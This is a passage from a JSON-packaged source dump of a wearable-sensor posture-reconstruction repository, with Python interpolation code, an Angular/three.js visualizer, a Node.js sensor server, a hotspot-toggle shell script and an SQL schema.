correctedTorsoQuat.inverse*leftQuat\n #leftRelative = transformations.euler_from_quaternion(leftRelativeQuat)\n #display(leftQuat)\n leftAccRelative = [leftAcc[i] - torsoAcc[i] for i in range(0, 3)]\n\n rightQuat = next(rightQuats)\n rightQuatValid = rightQuat[0] is not None and not (rightQuat[0] == rightQuat[1] and rightQuat[0] == rightQuat[2] and rightQuat[0] == rightQuat[3])\n if rightQuatValid:\n rightAcc = []\n rightAcc.append(next(rightAccs[0]))\n rightAcc.append(next(rightAccs[1]))\n rightAcc.append(next(rightAccs[2]))\n if torsoQuatValid:\n rightRelativeQuat = correctedTorsoQuat.inverse*rightQuat\n #rightRelative = transformations.euler_from_quaternion(rightRelativeQuat)\n rightAccRelative = [rightAcc[i] - torsoAcc[i] for i in range(0, 3)]\n yield (headRelativeQuat, leftRelativeQuat, rightRelativeQuat, headAccRelative, leftAccRelative, rightAccRelative)\n\n\n\ndef readData(inds, queues, data_dir):\n f = os.open(data_dir, os.O_NONBLOCK)\n while True:\n try:\n line = os.read(f, 4096).decode()\n if len(line) > 0:\n line = line.split('\\n')[-2]\n linelist = line.split(',')\n t = float(linelist[0])\n for i, ind in enumerate(inds):\n result = []\n for j in ind:\n result.append(float(linelist[j]))\n queues[i].put((t, result))\n else:\n time.sleep(0.05)\n except OSError as err:\n if err.errno == 11:\n continue\n else:\n raise err\n \n\n\ndef createInterpolator(data_dir):\n queues = [queue.Queue() for i in [0, 1, 2, 3]]\n th = threading.Thread(target=readData, args=([[3], [4], [5], [12, 13, 14]], queues, data_dir))\n th.daemon = True\n th.start()\n acc_x_inter = InterpoCubic(queues[0])\n acc_y_inter = InterpoCubic(queues[1])\n acc_z_inter = InterpoCubic(queues[2])\n quat_inter = InterpoQuat(queues[3])\n\n return (acc_x_inter, acc_y_inter, acc_z_inter, quat_inter)\n\n\nclass InterpoQuat:\n def __init__(self, data_time):\n self.data_time = data_time\n\n def evaluate(self, t):\n t0, data0 = self.data_time.get(block=True)\n t1, data1 = self.data_time.get(block=True)\n q = []\n for i in range(0, len(t)):\n while t[i] > t1:\n t0 = t1\n data0 = data1\n t1, data1 = self.data_time.get(block=True)\n\n #Here I assumed roll pitch yaw, but data may come in a different order\n q0 = transformations.quaternion_from_euler(data0[0], data0[1], data0[2]) \n q1 = transformations.quaternion_from_euler(data1[0], data1[1], data1[2])\n q0 = Quaternion(q0[3], q0[0], q0[1], q0[2])\n q1 = Quaternion(q1[3], q1[0], q1[1], q1[2])\n\n w = (t[i] - t0)/(t1 - t0)\n yield Quaternion.slerp(q0, q1, w)\n\nclass InterpoCubic:\n def __init__(self, data_time):\n self.data_time = data_time\n\n def evaluate(self, t):\n qtime = collections.deque([])\n qdata = collections.deque([])\n for i in range(0, 11):\n time, data = self.data_time.get(block=True)\n qtime.append(time)\n qdata.append(data)\n for i in range(0, len(t)):\n while t[i] > qtime[5]:\n time, data = self.data_time.get(block=True)\n qtime.append(time)\n qdata.append(data)\n qtime.popleft()\n qdata.popleft()\n poly = CubicSpline(qtime, qdata)\n yield poly(t)\n\ndef Calibrate(quat):\n #torsoZRotate = Quaternion([0.707, 0, 0, 0.707])\n torsoZRotate = Quaternion([1, 0, 0, 0])\n offset = quat*torsoZRotate\n euler = list(transformations.euler_from_quaternion([offset[1], offset[2], offset[3], offset[0]]))\n euler[0] = 0 #roll\n euler[1] = 0 #pitch\n expected = transformations.quaternion_from_euler(euler[0], euler[1], euler[2])\n expected = Quaternion(expected[3], expected[0], expected[1], expected[2])\n Offset = quat.inverse*expected\n return Offset\n\n"
},
{
"alpha_fraction": 0.63626629114151,
"alphanum_fraction": 0.6595574021339417,
"avg_line_length": 34.687896728515625,
"blob_id": "e2f11fcbca2587b8430c9e9a0a870bca8edc188e",
"content_id": "16fa6d82b48c89e5713e0960a51befa97e008d14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 11206,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 314,
"path": "/oriTrakHAR-master/rawDataVis/src/app/components/shpere-hist/shpere-hist.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit, AfterViewInit, Input, OnChanges } from '@angular/core';\nimport { Observable } from 'rxjs/Observable';\nimport { DataModelService } from '../../services/data-model.service';\n\nimport * as THREE from 'three';\n@Component({\n selector: 'app-shpere-hist',\n templateUrl: './shpere-hist.component.html',\n styleUrls: ['./shpere-hist.component.css']\n})\nexport class ShpereHistComponent implements OnInit {\n @Input() name: string;\n @Input() container: HTMLElement;\n @Input() axisNames: string[];\n @Input() ratio: number;\n\n histUpdateObservable: Observable<any> = this.dataModel.getNewHistUpdateSubscribable()\n camera: any;\n scene: any;\n renderer: any;\n geometry: any;\n material: any;\n mesh: any;\n rendererHeight = 800;\n rendererWidth = 800;\n RADUIS = 350;\n AXIS_LENGTH = 430;\n\n TRACE_SEGMENTS = 25;\n objectDragged = 'none';\n mousePos = {x: 0, y: 0};\n cameraPos = {x: 0.425, y: 0.595};\n vectorObject: any = new THREE.Line();\n\n sphere: THREE.Mesh\n\n vectorQuaternion: any = new THREE.Quaternion();\n rotationAxis: any = new THREE.Vector3(0, 1, 0);\n axisXName: any;\n axisYName: any;\n axisZName: any;\n // eulerOrder = 'XYZ';\n eulerOrder = 'YZX';\n\n showAxis = true;\n constructor(private dataModel: DataModelService) { }\n\n ngOnInit() {\n this.rendererHeight *= this.ratio;\n this.rendererWidth *= this.ratio;\n const aspectRatio = 1;\n this.camera = new THREE.PerspectiveCamera(75, aspectRatio, 1, 10000);\n this.turnCamera();\n\n this.scene = new THREE.Scene();\n // this.scene.add( new THREE.HemisphereLight( 0xffffee, 0x080820, 1 ); );\n\n\n this.initGrid();\n this.initAxes();\n this.initAxesNames();\n // this.initLineTrace();\n // this.initRotationAxis();\n\n\n\n this.renderer = new THREE.WebGLRenderer({ alpha: true , antialias: true});\n this.renderer.setSize(this.rendererWidth, this.rendererHeight);\n this.renderer.setClearColor( 0xffffff, 1 );\n this.container.appendChild(this.renderer.domElement);\n this.container.addEventListener('mousemove', this.handleMouseMove.bind(this), false);\n this.container.addEventListener('mousedown', this.handleMouseDown.bind(this), false);\n this.container.addEventListener('mouseup', this.handleMouseUp.bind(this), false);\n this.container.addEventListener('touchmove', this.handleTouchMove.bind(this), false);\n this.container.addEventListener('touchstart', this.handleTouchStart.bind(this), false);\n this.container.addEventListener('touchend', this.handleTouchEnd.bind(this), false);\n // this.updateRotationAxis();\n\n // this.scene.add(this.rotationAxisObject);\n\n // vectorQuaternion.normalize();\n // this.renderer.render(this.scene, this.camera);\n // this.animate(this.angleData);\n this.initSphere();\n this.updateVectorVisuals();\n this.renderer.render(this.scene, this.camera);\n this.animate();\n\n this.histUpdateObservable.subscribe((msg => {\n // console.log(msg)\n for (let i = 0; i < this.sphere.geometry.faces.length; i++) {\n let face = this.sphere.geometry.faces[i];\n face.color.setRGB(236 / 255, 240 / 255, 241 / 255)\n }\n msg.forEach(d => {\n // console.log(d)\n let face = this.sphere.geometry.faces[d.bin]\n // console.log(d.color)\n if (face) {\n face.color.setRGB(d.color.r / 255, d.color.g / 255, d.color.b / 255)\n } else {\n // console.log(d)\n }\n })\n this.sphere.geometry.verticesNeedUpdate = true;\n this.sphere.geometry.elementsNeedUpdate = true;\n this.sphere.geometry.morphTargetsNeedUpdate = true;\n this.sphere.geometry.uvsNeedUpdate = true;\n this.sphere.geometry.normalsNeedUpdate = true;\n this.sphere.geometry.colorsNeedUpdate = true;\n this.sphere.geometry.tangentsNeedUpdate = true;\n // console.log('set color finished')\n }).bind(this))\n }\n\n\n animate() {\n // this.vectorQuaternion.x = angleData.quaternion.x;\n // this.vectorQuaternion.w = angleData.quaternion.w;\n // this.vectorQuaternion.y = angleData.quaternion.y;\n // this.vectorQuaternion.z = angleData.quaternion.z;\n\n // this.updateRotationAxis();\n this.updateVectorVisuals();\n this.renderer.render(this.scene, this.camera);\n this.updateAxesNames();\n setTimeout(() => {\n this.animate();\n } , 30);\n }\n\n updateVectorVisuals() {\n\n }\n\n turnCamera() {\n this.camera.position.x = Math.sin(this.cameraPos.x) * 1000 * Math.cos(this.cameraPos.y);\n this.camera.position.z = Math.cos(this.cameraPos.x) * 1000 * Math.cos(this.cameraPos.y);\n this.camera.position.y = Math.sin(this.cameraPos.y) * 1000;\n this.camera.lookAt(new THREE.Vector3(0, 0, 0));\n }\n\n initGrid() {\n const GRID_SEGMENT_COUNT = 5;\n const gridLineMat = new THREE.LineBasicMaterial({color: 0xDDDDDD});\n const gridLineMatThick = new THREE.LineBasicMaterial({color: 0xAAAAAA, linewidth: 2});\n\n for (let i = -GRID_SEGMENT_COUNT; i <= GRID_SEGMENT_COUNT; i++) {\n const dist = this.AXIS_LENGTH * i / GRID_SEGMENT_COUNT;\n const gridLineGeomX = new THREE.Geometry();\n const gridLineGeomY = new THREE.Geometry();\n\n if (i === 0) {\n gridLineGeomX.vertices.push(new THREE.Vector3(dist, 0, -this.AXIS_LENGTH));\n gridLineGeomX.vertices.push(new THREE.Vector3(dist, 0, 0));\n\n gridLineGeomY.vertices.push(new THREE.Vector3(-this.AXIS_LENGTH, 0, dist));\n gridLineGeomY.vertices.push(new THREE.Vector3( 0, 0, dist));\n\n this.scene.add(new THREE.Line(gridLineGeomX, gridLineMatThick));\n this.scene.add(new THREE.Line(gridLineGeomY, gridLineMatThick));\n } else {\n gridLineGeomX.vertices.push(new THREE.Vector3(dist, 0, -this.AXIS_LENGTH));\n gridLineGeomX.vertices.push(new THREE.Vector3(dist, 0, this.AXIS_LENGTH));\n\n gridLineGeomY.vertices.push(new THREE.Vector3(-this.AXIS_LENGTH, 0, dist));\n gridLineGeomY.vertices.push(new THREE.Vector3( this.AXIS_LENGTH, 0, dist));\n\n this.scene.add(new THREE.Line(gridLineGeomX, gridLineMat));\n this.scene.add(new THREE.Line(gridLineGeomY, gridLineMat));\n }\n }\n }\n\n initAxes() {\n const xAxisMat = new THREE.LineBasicMaterial({color: 0xff0000, linewidth: 2});\n const xAxisGeom = new THREE.Geometry();\n xAxisGeom.vertices.push(new THREE.Vector3(0, 0, 0));\n xAxisGeom.vertices.push(new THREE.Vector3(this.AXIS_LENGTH, 0, 0));\n const xAxis = new THREE.Line(xAxisGeom, xAxisMat);\n this.scene.add(xAxis);\n\n const yAxisMat = new THREE.LineBasicMaterial({color: 0x00cc00, linewidth: 2});\n const yAxisGeom = new THREE.Geometry();\n yAxisGeom.vertices.push(new THREE.Vector3(0, 0, 0));\n yAxisGeom.vertices.push(new THREE.Vector3(0, this.AXIS_LENGTH, 0));\n const yAxis = new THREE.Line(yAxisGeom, yAxisMat);\n this.scene.add(yAxis);\n\n const zAxisMat = new THREE.LineBasicMaterial({color: 0x0000ff, linewidth: 2});\n const zAxisGeom = new THREE.Geometry();\n zAxisGeom.vertices.push(new THREE.Vector3(0, 0, 0));\n zAxisGeom.vertices.push(new THREE.Vector3(0, 0, this.AXIS_LENGTH));\n const zAxis = new THREE.Line(zAxisGeom, zAxisMat);\n this.scene.add(zAxis);\n }\n\n initAxesNames() {\n const objects = new Array(3);\n const colors = ['#ff0000', '#00cc00', '#0000ff'];\n for (let i = 0, len = objects.length; i < len; i++) {\n objects[i] = document.createElement('div');\n objects[i].innerHTML = this.axisNames[i];\n objects[i].style.position = 'absolute';\n objects[i].style.transform = 'translateX(-50%) translateY(-50%)';\n objects[i].style.color = colors[i];\n document.body.appendChild(objects[i]);\n }\n this.axisXName = objects[0];\n this.axisYName = objects[1];\n this.axisZName = objects[2];\n }\n\n setAxisNames(axisName) {\n this.axisXName.innerHTML = axisName[0];\n this.axisYName.innerHTML = axisName[1];\n this.axisZName.innerHTML = axisName[2];\n }\n\n initSphere() {\n const faceColorMaterial = new THREE.MeshBasicMaterial(\n { color: 0xffffff, vertexColors: THREE.FaceColors } );\n\n const sphereGeometry = new THREE.SphereGeometry(this.RADUIS, 72, 36);\n console.log(sphereGeometry.faces.length)\n for (let i = 0; i < sphereGeometry.faces.length; i++) {\n let face = sphereGeometry.faces[i];\n face.color.setRGB(236 / 255, 240 / 255, 241 / 255)\n // if (i < 10) {\n // face.color.setRGB(1, 0, 0)\n // }\n }\n this.sphere = new THREE.Mesh( sphereGeometry, faceColorMaterial );\n //https://github.com/stemkoski/stemkoski.github.com/blob/master/Three.js/Mouse-Click.html\n this.scene.add( this.sphere );\n }\n\n handlePointerMove(x, y) {\n const mouseDiffX = x - this.mousePos.x;\n const mouseDiffY = y - this.mousePos.y;\n this.mousePos = {x: x, y: y};\n if (this.objectDragged === 'scene') {\n this.cameraPos.x -= mouseDiffX / 200;\n this.cameraPos.y += mouseDiffY / 200;\n this.cameraPos.y = Math.min(this.cameraPos.y, 3.1415926 / 2);\n this.cameraPos.y = Math.max(this.cameraPos.y, -3.1415926 / 2);\n this.turnCamera();\n }\n }\n\n handleTouchMove(event) {\n if (this.objectDragged !== 'none') {\n event.preventDefault();\n }\n this.handlePointerMove(event.touches[0].clientX, event.touches[0].clientY);\n }\n\n handleMouseMove(event) {\n if (this.objectDragged !== 'none') {\n event.preventDefault();\n }\n this.handlePointerMove(event.clientX, event.clientY);\n }\n\n\n handleTouchStart(event) {\n this.handlePointerStart(event.touches[0].clientX, event.touches[0].clientY);\n }\n handleMouseDown(event) {\n this.handlePointerStart(event.clientX, event.clientY);\n }\n\n handlePointerStart(x, y) {\n this.mousePos = {x: x, y: y};\n const rect = this.renderer.domElement.getBoundingClientRect();\n if (this.mousePos.x >= rect.left\n && this.mousePos.x <= rect.left + this.rendererWidth\n && this.mousePos.y >= rect.top\n && this.mousePos.y <= rect.top + this.rendererHeight && this.objectDragged === 'none') {\n this.objectDragged = 'scene';\n }\n }\n\n handleTouchEnd(event) {\n this.objectDragged = 'none';\n }\n handleMouseUp(event) {\n this.objectDragged = 'none';\n }\n\n toXYCoords(pos) {\n const sitetop = window.pageYOffset || document.documentElement.scrollTop;\n const siteleft = window.pageXOffset || document.documentElement.scrollLeft;\n const vector = pos.clone().project(this.camera);\n const rect = this.renderer.domElement.getBoundingClientRect();\n const vector2 = new THREE.Vector3(0, 0, 0);\n vector2.x = siteleft + rect.left + ( vector.x + 1) / 2 * (rect.right - rect.left);\n vector2.y = sitetop + rect.top + (-vector.y + 1) / 2 * (rect.bottom - rect.top);\n return vector2;\n }\n\n updateAxesNames() {\n this.setAxisNames(this.axisNames)\n const distance = this.AXIS_LENGTH * 1.1;\n const vectors = [new THREE.Vector3(distance, 0, 0), new THREE.Vector3(0, distance, 0), new THREE.Vector3(0, 0, distance)];\n const objects = [this.axisXName, this.axisYName, this.axisZName];\n for (let i = 0; i < objects.length; i++) {\n const position = this.toXYCoords(vectors[i]);\n objects[i].style.top = position.y + 'px';\n objects[i].style.left = position.x + 'px';\n }\n }\n\n}\n"
},
{
"alpha_fraction": 0.6007773280143738,
"alphanum_fraction": 0.6557468175888062,
"avg_line_length": 37.29787063598633,
"blob_id": "efc5e4e344d3c58dccccf0d9fb793e5f6b9faf5d",
"content_id": "1957fc381ebfacfefa781a6628a37bb0b14cb45e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1801,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 47,
"path": "/python-code/filter.py",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom processStream import processRow\n\ndt = 0.05\nsigma = 0.1\nt = np.linspace(0, 100, 100/dt)\n\ninterpolatedData = processRow(['pipe1', 'pipe2','pipe3','pipe4'], t)\n_, leftQuat2, rightQuat2, _, _, _ = next(interpolatedData)\nleftPoswe2 = leftQuat2.rotate([0, 0, -1])\nrightPoswe2 = rightQuat2.rotate([0, 0, -1])\n_, leftQuat1, rightQuat1, _, _, _ = next(interpolatedData)\nleftPoswe1 = leftQuat1.rotate([0, 0, -1])\nrightPoswe1 = rightQuat1.rotate([0, 0, -1])\n\n_, leftQuat, rightQuat, _, leftAcc, rightAcc = next(interpolatedData)\nleftPoswe = leftQuat.rotate([0, 0, -1])\nrightPoswe = rightQuat.rotate([0, 0, -1])\nleftAccwe = (leftPoswe + leftPoswe2 - 2*leftPoswe1)/dt**2\nrightAccwe = (rightPoswe + rightPoswe2 - 2*rightPoswe1)/dt**2\nleftAccElbow = leftQuat.rotate(leftAcc) - leftAccwe\nrightAccElbow = rightQuat.rotate(rightAcc) - rightAccwe\n\ndef gaussian1D(sigma):\n x = np.linspace(-0.5, 0.51, 11)\n density = np.exp(np.square(x)/sigma)\n return density\n\ndef gaussian3D(u, sigma):\n x = np.linspace(-1, 1.01, 21) - u[0]\n y = np.linspace(-1, 1.01, 21) - u[1]\n z = np.linspace(-1, 1.01, 21) - u[2]\n xv, yv, zv = np.meshgrid(x, y, z)\n xv = np.expand_dims(xv, axis=-1)\n yv = np.expand_dims(xv, axis=-1)\n zv = np.expand_dims(xv, axis=-1)\n cat = np.concatenate(xv, yv, zv, axis=-1)\n density = np.exp(np.sum(np.matmul(cat, sigma)*cat, axis=-1))\n return density\n\ndef next(p1, p2, prior, acc):\n density = 2*p1 - p2 + t**2*acc\n kernel = gaussian1D(sigma)\n np.apply_along_axis(lambda m: np.convolve(m, kernel, mode='full'), axis=0, arr=density)\n np.apply_along_axis(lambda m: np.convolve(m, kernel, mode='full'), axis=1, arr=density)\n np.apply_along_axis(lambda m: np.convolve(m, kernel, mode='full'), axis=2, arr=density)\n return density*prior\n\n"
},
{
"alpha_fraction": 0.5766888856887817,
"alphanum_fraction": 0.6106117963790894,
"avg_line_length": 27.983192443847656,
"blob_id": "c81af8c03adf425defe62c769fcaeaf29ca47567",
"content_id": "9e9def2015fcf0becc9feb9c5fe16905595981e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3449,
"license_type": "no_license",
"max_line_length": 204,
"num_lines": 119,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer_streamming/dataServer.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "'use strict'\nconst net = require('net')\nconst os = require('os')\nconst dataServer = net.createServer()\n// const dbService = require('./db_service')\nconst realtimeVis = require('./realtimeVis')\nconst express = require('express')\nconst config = require('./config')\n\nvar app = express()\nvar macAddr\nconst platform = os.platform()\nif (platform === 'darwin') {\n macAddr = os.networkInterfaces().en3[0].mac\n} else if (platform === 'linux') {\n try {\n macAddr = os.networkInterfaces().wlan0[0].mac // change wlan0 to what ever interface you are using\n } catch (e) {\n macAddr = os.networkInterfaces().wlan1[0].mac // change wlan0 to what ever interface you are using\n }\n}\n\nconst machineId = mac2Id(macAddr)\n\ndataServer.on('connection', client => {\n client.on('data', processData)\n})\n\ndataServer.listen(config.PORT)\n\napp.get('/health', (req, res) => {\n res.end(JSON.stringify(sensorFreq))\n})\n\nvar appServer = app.listen(config.HEALTH_PORT)\n// realtimeVis.init(appServer)\n\nvar sensorFreq = {}\nvar counter = {}\n\nfunction processData (data) {\n var id = data.readUInt32LE(0)\n var idStr = id.toString()\n // console.log(idStr)\n if (counter.hasOwnProperty(idStr)) {\n counter[idStr] += 1\n } else {\n counter[idStr] = 0\n }\n var timestamp = data.readUInt32LE(4)\n var serverTimestamp = new Date().valueOf()\n switch (data.length) {\n case 60:\n var data100Hz = {\n quat: {\n w: data.readFloatLE(8),\n x: data.readFloatLE(12),\n y: data.readFloatLE(16),\n z: data.readFloatLE(20)\n },\n gyro: {\n x: data.readFloatLE(24),\n y: data.readFloatLE(28),\n z: data.readFloatLE(32)\n },\n lacc: {\n x: data.readFloatLE(36),\n y: data.readFloatLE(40),\n z: data.readFloatLE(44)\n },\n acc: {\n x: data.readFloatLE(48),\n y: data.readFloatLE(52),\n z: data.readFloatLE(56)\n }\n }\n realtimeVis.updateRealtimeVis(data100Hz.quat, idStr)\n var avgAcc = accMag(data100Hz.acc)\n // console.log(`acc_x: ${data100Hz.acc.x} acc_y: ${data100Hz.acc.y} acc_z: ${data100Hz.acc.z} acc_avg: ${avgAcc}`)\n // if (avgAcc < config.FREE_FALL_ACC_THRESHOLD) {\n // console.log('\\n\\n\\n\\n\\n\\n!!!!!!!!!!!!!!!\\n\\n\\n\\n\\n\\n')\n // }\n // dbService.insertSensorData100Hz(machineId, id, timestamp, serverTimestamp, data100Hz)\n break\n case 20:\n var data20Hz = {\n mag: {\n x: data.readFloatLE(8),\n y: data.readFloatLE(12),\n z: data.readFloatLE(16)\n }\n }\n // dbService.insertSensorData20Hz(machineId, id, timestamp, serverTimestamp, data20Hz)\n break\n case 12:\n var data1Hz = {\n temp: data.readFloatLE(8)\n }\n // dbService.insertSensorData1Hz(machineId, id, timestamp, serverTimestamp, data1Hz)\n break\n }\n}\n\nsetInterval(() => {\n var serverTimestamp = new Date().valueOf()\n Object.keys(counter).forEach(key => {\n sensorFreq[key] = counter[key]\n // dbService.insertHealth(machineId, parseInt(key), serverTimestamp, counter[key])\n counter[key] = 0\n })\n}, 1000)\n\nfunction mac2Id (mac) {\n return Buffer.from([Buffer.from(mac.substring(6, 8), 16), Buffer.from(mac.substring(9, 11), 16), Buffer.from(mac.substring(12, 14), 16), Buffer.from(mac.substring(15, 17), 16)].join('')).readUInt32LE(0)\n}\n\nfunction accMag (acc) {\n return Math.sqrt(acc.x * acc.x + acc.y * acc.y + acc.z * acc.z)\n}\n"
},
{
"alpha_fraction": 0.7102615833282471,
"alphanum_fraction": 0.7102615833282471,
"avg_line_length": 23.850000381469727,
"blob_id": "31e17fbec296753241e118abb9856e062d4cfa87",
"content_id": "b2bf6cd046cbd0e8993d507584dbe616eedd4d52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 497,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 20,
"path": "/oriTrakHAR-master/rawDataVis/src/app/app.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit } from '@angular/core';\nimport { SockService } from './services/sock.service';\nimport { DataModelService } from './services/data-model.service';\nimport { Observable } from 'rxjs/Observable';\n\n@Component({\n selector: 'app-root',\n templateUrl: './app.component.html',\n styleUrls: ['./app.component.css']\n})\nexport class AppComponent implements OnInit {\n constructor(private dataModel: DataModelService, private sock: SockService) {\n\n }\n\n public ngOnInit() {\n\n }\n\n}\n"
},
{
"alpha_fraction": 0.3826998770236969,
"alphanum_fraction": 0.6395806074142456,
"avg_line_length": 22.84375,
"blob_id": "e4a8b49b6b60ee8eb17632e6446c2a7933e24e59",
"content_id": "8c0dbff78b726f70aff73e14b68defb400aa8385",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 763,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 32,
"path": "/oriTrakHAR-master/config.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "module.exports = {\n UPDATE_INTERVAL: 600, // sqlite database begin transaction - commit interval\n SOCKET_IO_PORT: 8088,\n EULER_ORDER: 'YZX',\n ANSWER_INTERVAL: 5,\n SENSOR_DICT: {\n '11212505': 'torso',\n '3080144': 'leftArm',\n '4257286': 'rightArm',\n '3074338': 'head'\n },\n PORT: 9000,\n HEALTH_PORT: 6000,\n POLL_INTERVAL_MIN: 50,\n POLL_INTERVAL_MAX: 100,\n TINY_SYNC_NUM_POINTS: 8,\n DEFAULT_TORSO_OFFSET: {\n w: -0.01483116439305834,\n x: 0.6592238955120293,\n y: 0.747234344297174,\n z: 0.08257845853418903\n },\n DEFAULT_HEAD_OFFSET: {\n w: -0.10168719246516468,\n x: 0.6256875209846358,\n y: 0.772480857046293,\n z: 0.038392103277664215\n },\n FREE_FALL_ACC_THRESHOLD: 1.2,\n STATIC_ACC_MIN: 9.7,\n STATIC_ACC_MAX: 9.9\n}\n"
},
{
"alpha_fraction": 0.6803953647613525,
"alphanum_fraction": 0.686985194683075,
"avg_line_length": 24.29166603088379,
"blob_id": "eb82f61a17b91050eed94e8719a4547af3da1e76",
"content_id": "0aff8c9383c2ad544795ccc8dd9a7617051dbc0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 607,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 24,
"path": "/hotspot_to_client.sh",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "function swap()\n{\n local TMPFILE=tmp.$$\n sudo mv \"$1\" $TMPFILE\n sudo mv \"$2\" \"$1\"\n sudo mv $TMPFILE \"$2\"\n}\n\nswap \"/etc/dnsmasq.conf\" \"/etc/dnsmasq.conf.save\"\nswap \"/etc/default/hostapd\" \"/etc/default/hostapd.save\"\nswap \"/etc/dhcpcd.conf\" \"/etc/dhcpcd.conf.save\"\nswap \"/etc/network/interfaces\" \"/etc/network/interfaces.save\"\n\nvariableA=$(systemctl is-active hostapd)\nif [ $variableA = \"active\" ]\nthen\n echo \"Hotspot stopped\"\n sudo systemctl stop hostapd\n sudo systemctl stop dnsmasq\nelse\n echo \"Hotspot started\"\n sudo systemctl start hostapd\n sudo systemctl start dnsmasq\nfi\n"
},
{
"alpha_fraction": 0.5912858247756958,
"alphanum_fraction": 0.6337160468101501,
"avg_line_length": 31.314496994018555,
"blob_id": "0fe70f704243b0d2f768bd81d0e904e2d51c0277",
"content_id": "aa607ea401810ea71e5610183200fea83ff1b093",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 13151,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 407,
"path": "/oriTrakHAR-master/dataProcessing/initOutputDb.sql",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "CREATE TABLE IF NOT EXISTS Preprocessed100HZData (\n interpolated_fixed_rate_time INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n\n torso_quat_w REAL DEFAULT NULL,\n torso_quat_x REAL DEFAULT NULL,\n torso_quat_y REAL DEFAULT NULL,\n torso_quat_z REAL DEFAULT NULL,\n torso_gyro_x REAL DEFAULT NULL,\n torso_gyro_y REAL DEFAULT NULL,\n torso_gyro_z REAL DEFAULT NULL,\n torso_acc_x REAL DEFAULT NULL,\n torso_acc_y REAL DEFAULT NULL,\n torso_acc_z REAL DEFAULT NULL,\n\n torso_acc_mag REAL DEFAULT NULL,\n torso_gyro_mag REAL DEFAULT NULL,\n torso_yaw REAL DEFAULT NULL,\n torso_pitch REAL DEFAULT NULL,\n torso_roll REAL DEFAULT NULL,\n\n\n head_quat_w REAL DEFAULT NULL,\n head_quat_x REAL DEFAULT NULL,\n head_quat_y REAL DEFAULT NULL,\n head_quat_z REAL DEFAULT NULL,\n head_gyro_x REAL DEFAULT NULL,\n head_gyro_y REAL DEFAULT NULL,\n head_gyro_z REAL DEFAULT NULL,\n head_acc_x REAL DEFAULT NULL,\n head_acc_y REAL DEFAULT NULL,\n head_acc_z REAL DEFAULT NULL,\n\n head_acc_mag REAL DEFAULT NULL,\n head_gyro_mag REAL DEFAULT NULL,\n head_yaw REAL DEFAULT NULL,\n head_pitch REAL DEFAULT NULL,\n head_roll REAL DEFAULT NULL,\n head_relative_yaw REAL DEFAULT NULL,\n head_relative_pitch REAL DEFAULT NULL,\n head_relative_roll REAL DEFAULT NULL,\n\n\n left_quat_w REAL DEFAULT NULL,\n left_quat_x REAL DEFAULT NULL,\n left_quat_y REAL DEFAULT NULL,\n left_quat_z REAL DEFAULT NULL,\n left_gyro_x REAL DEFAULT NULL,\n left_gyro_y REAL DEFAULT NULL,\n left_gyro_z REAL DEFAULT NULL,\n left_acc_x REAL DEFAULT NULL,\n left_acc_y REAL DEFAULT NULL,\n left_acc_z REAL DEFAULT NULL,\n\n left_acc_mag REAL DEFAULT NULL,\n left_gyro_mag REAL DEFAULT NULL,\n left_yaw REAL DEFAULT NULL,\n left_pitch REAL DEFAULT NULL,\n left_roll REAL DEFAULT NULL,\n left_relative_yaw REAL DEFAULT NULL,\n left_relative_pitch REAL DEFAULT NULL,\n left_relative_roll REAL DEFAULT NULL,\n\n\n right_quat_w REAL DEFAULT NULL,\n right_quat_x REAL DEFAULT NULL,\n right_quat_y REAL DEFAULT NULL,\n right_quat_z REAL DEFAULT NULL,\n right_gyro_x REAL DEFAULT NULL,\n right_gyro_y REAL DEFAULT NULL,\n right_gyro_z REAL DEFAULT NULL,\n right_acc_x REAL DEFAULT NULL,\n right_acc_y REAL DEFAULT NULL,\n right_acc_z REAL DEFAULT NULL,\n\n right_acc_mag REAL DEFAULT NULL,\n right_gyro_mag REAL DEFAULT NULL,\n right_yaw REAL DEFAULT NULL,\n right_roll REAL DEFAULT NULL,\n right_pitch REAL DEFAULT NULL,\n right_relative_yaw REAL DEFAULT NULL,\n right_relative_pitch REAL DEFAULT NULL,\n right_relative_roll REAL DEFAULT NULL\n);\n\nCREATE TABLE IF NOT EXISTS Preprocessed20HZData (\n interpolated_fixed_rate_time INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n\n torso_magn_x REAL DEFAULT NULL,\n torso_magn_y REAL DEFAULT NULL,\n torso_magn_z REAL DEFAULT NULL,\n torso_magn_mag REAL DEFAULT NULL,\n\n head_magn_x REAL DEFAULT NULL,\n head_magn_y REAL DEFAULT NULL,\n head_magn_z REAL DEFAULT NULL,\n head_magn_mag REAL DEFAULT NULL,\n\n\n left_magn_x REAL DEFAULT NULL,\n left_magn_y REAL DEFAULT NULL,\n left_magn_z REAL DEFAULT NULL,\n left_magn_mag REAL DEFAULT NULL,\n\n\n right_magn_x REAL DEFAULT NULL,\n right_magn_y REAL DEFAULT NULL,\n right_magn_z 